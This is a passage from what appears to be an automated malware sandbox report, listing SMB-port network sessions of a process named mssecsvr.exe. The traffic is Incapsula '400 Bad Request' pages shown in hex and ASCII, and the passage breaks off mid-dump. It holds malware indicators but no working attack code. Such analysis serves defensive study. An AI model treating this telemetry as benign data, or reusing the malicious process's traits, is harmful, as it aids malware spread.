                                                                                            Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 32 26 78 69 6e 66 6f 3d 31 34 2d 34 37 31 36 30 35 39 34 39 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 36 37 31 37 30 30 30 38 30 32 31 35 25 32 30 35 34 25 32 39 25 32 30 71 25 32 38 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 25 32 30 62 31 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 32 30 30 38 35 37 33 36 30 33 38 37 33 36 32 31 35 31 38 26 65 64 65 74 3d 33 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 70 65 3d 35 34 34 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 4e 41 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 32 30 30 38 35 37 33 36 30 33 38 37 33 36 32 31 35 31 38 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                            Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=2&xinfo=14-471605949-0%200NNN%20RT%281671700080215%2054%29%20q%28-1%20-1%20-1%20-1%29%20r%280%20-1%29%20b1&incident_id=0-2008573603873621518&edet=3&cinfo=ffffffff&pe=544&rpinfo=0&mth=NA" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-2008573603873621518</iframe></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            1545.60.37.1445192.168.2.359794C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Dec 22, 2022 10:08:04.738900900 CET521INHTTP/1.1 400 Bad Request
                                                                                            Content-Type: text/html
                                                                                            Cache-Control: no-cache, no-store
                                                                                            Connection: close
                                                                                            Content-Length: 703
                                                                                            X-Iinfo: 13-404753273-0 0NNN RT(1671700083811 70) q(-1 -1 -1 -1) r(0 -1) b1
                                                                                            Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 32 26 78 69 6e 66 6f 3d 31 33 2d 34 30 34 37 35 33 32 37 33 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 36 37 31 37 30 30 30 38 33 38 31 31 25 32 30 37 30 25 32 39 25 32 30 71 25 32 38 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 25 32 30 62 31 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 31 37 32 38 33 37 34 33 33 31 32 33 34 31 32 35 33 32 35 26 65 64 65 74 3d 33 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 70 65 3d 35 34 34 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 4e 41 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 31 37 32 38 33 37 34 33 33 31 32 33 34 31 32 35 33 32 35 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                            Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=2&xinfo=13-404753273-0%200NNN%20RT%281671700083811%2070%29%20q%28-1%20-1%20-1%20-1%29%20r%280%20-1%29%20b1&incident_id=0-1728374331234125325&edet=3&cinfo=ffffffff&pe=544&rpinfo=0&mth=NA" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-1728374331234125325</iframe></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            1645.60.37.2445192.168.2.359900C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Dec 22, 2022 10:08:05.296781063 CET523INHTTP/1.1 400 Bad Request
                                                                                            Content-Type: text/html
                                                                                            Cache-Control: no-cache, no-store
                                                                                            Connection: close
                                                                                            Content-Length: 702
                                                                                            X-Iinfo: 14-508717881-0 0NNN RT(1671700084942 0) q(-1 -1 -1 -1) r(0 -1) b1
                                                                                            Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 32 26 78 69 6e 66 6f 3d 31 34 2d 35 30 38 37 31 37 38 38 31 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 36 37 31 37 30 30 30 38 34 39 34 32 25 32 30 30 25 32 39 25 32 30 71 25 32 38 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 25 32 30 62 31 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 32 31 39 34 35 35 33 30 36 32 32 34 39 34 30 36 30 33 30 26 65 64 65 74 3d 33 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 70 65 3d 35 34 34 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 4e 41 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 32 31 39 34 35 35 33 30 36 32 32 34 39 34 30 36 30 33 30 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                            Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=2&xinfo=14-508717881-0%200NNN%20RT%281671700084942%200%29%20q%28-1%20-1%20-1%20-1%29%20r%280%20-1%29%20b1&incident_id=0-2194553062249406030&edet=3&cinfo=ffffffff&pe=544&rpinfo=0&mth=NA" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-2194553062249406030</iframe></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            1745.60.37.2445192.168.2.360220C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Dec 22, 2022 10:08:08.642575026 CET533INHTTP/1.1 400 Bad Request
                                                                                            Content-Type: text/html
                                                                                            Cache-Control: no-cache, no-store
                                                                                            Connection: close
                                                                                            Content-Length: 699
                                                                                            X-Iinfo: 7-208338009-0 0NNN RT(1671700088288 0) q(-1 -1 -1 -1) r(0 -1) b1
                                                                                            Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 32 26 78 69 6e 66 6f 3d 37 2d 32 30 38 33 33 38 30 30 39 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 36 37 31 37 30 30 30 38 38 32 38 38 25 32 30 30 25 32 39 25 32 30 71 25 32 38 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 25 32 30 62 31 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 39 30 34 36 38 31 39 34 36 39 37 34 34 36 31 35 31 31 26 65 64 65 74 3d 33 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 70 65 3d 35 34 34 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 4e 41 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 39 30 34 36 38 31 39 34 36 39 37 34 34 36 31 35 31 31 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                            Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=2&xinfo=7-208338009-0%200NNN%20RT%281671700088288%200%29%20q%28-1%20-1%20-1%20-1%29%20r%280%20-1%29%20b1&incident_id=0-904681946974461511&edet=3&cinfo=ffffffff&pe=544&rpinfo=0&mth=NA" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-904681946974461511</iframe></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            1845.60.37.3445192.168.2.360225C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Dec 22, 2022 10:08:09.200874090 CET537INHTTP/1.1 400 Bad Request
                                                                                            Content-Type: text/html
                                                                                            Cache-Control: no-cache, no-store
                                                                                            Connection: close
                                                                                            Content-Length: 699
                                                                                            X-Iinfo: 4-167899359-0 0NNN RT(1671700088344 0) q(-1 -1 -1 -1) r(0 -1) b1
                                                                                            Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 32 26 78 69 6e 66 6f 3d 34 2d 31 36 37 38 39 39 33 35 39 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 36 37 31 37 30 30 30 38 38 33 34 34 25 32 30 30 25 32 39 25 32 30 71 25 32 38 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 25 32 30 62 31 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 37 32 37 32 39 39 30 31 31 36 37 30 35 30 39 30 36 30 26 65 64 65 74 3d 33 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 70 65 3d 35 34 34 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 4e 41 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 37 32 37 32 39 39 30 31 31 36 37 30 35 30 39 30 36 30 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                            Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=2&xinfo=4-167899359-0%200NNN%20RT%281671700088344%200%29%20q%28-1%20-1%20-1%20-1%29%20r%280%20-1%29%20b1&incident_id=0-727299011670509060&edet=3&cinfo=ffffffff&pe=544&rpinfo=0&mth=NA" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-727299011670509060</iframe></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            1945.60.37.3445192.168.2.360550C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Dec 22, 2022 10:08:12.552830935 CET545INHTTP/1.1 400 Bad Request
                                                                                            Content-Type: text/html
                                                                                            Cache-Control: no-cache, no-store
                                                                                            Connection: close
                                                                                            Content-Length: 702
                                                                                            X-Iinfo: 13-404753917-0 0NNN RT(1671700091696 0) q(-1 -1 -1 -1) r(0 -1) b1
                                                                                            Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 32 26 78 69 6e 66 6f 3d 31 33 2d 34 30 34 37 35 33 39 31 37 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 36 37 31 37 30 30 30 39 31 36 39 36 25 32 30 30 25 32 39 25 32 30 71 25 32 38 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 25 32 30 62 31 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 31 37 32 38 33 37 36 35 36 34 36 31 37 31 31 39 32 34 35 26 65 64 65 74 3d 33 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 70 65 3d 35 34 34 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 4e 41 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 31 37 32 38 33 37 36 35 36 34 36 31 37 31 31 39 32 34 35 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                            Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=2&xinfo=13-404753917-0%200NNN%20RT%281671700091696%200%29%20q%28-1%20-1%20-1%20-1%29%20r%280%20-1%29%20b1&incident_id=0-1728376564617119245&edet=3&cinfo=ffffffff&pe=544&rpinfo=0&mth=NA" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-1728376564617119245</iframe></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            2192.168.2.349861204.79.197.200443C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            2045.60.37.4445192.168.2.360656C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Dec 22, 2022 10:08:13.104687929 CET548INHTTP/1.1 400 Bad Request
                                                                                            Content-Type: text/html
                                                                                            Cache-Control: no-cache, no-store
                                                                                            Connection: close
                                                                                            Content-Length: 702
                                                                                            X-Iinfo: 13-436786214-0 0NNN RT(1671700092204 0) q(-1 -1 -1 -1) r(0 -1) b1
                                                                                            Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 32 26 78 69 6e 66 6f 3d 31 33 2d 34 33 36 37 38 36 32 31 34 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 36 37 31 37 30 30 30 39 32 32 30 34 25 32 30 30 25 32 39 25 32 30 71 25 32 38 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 25 32 30 62 31 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 31 38 36 30 30 39 38 36 34 36 30 33 35 37 33 32 38 37 37 26 65 64 65 74 3d 33 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 70 65 3d 35 34 34 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 4e 41 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 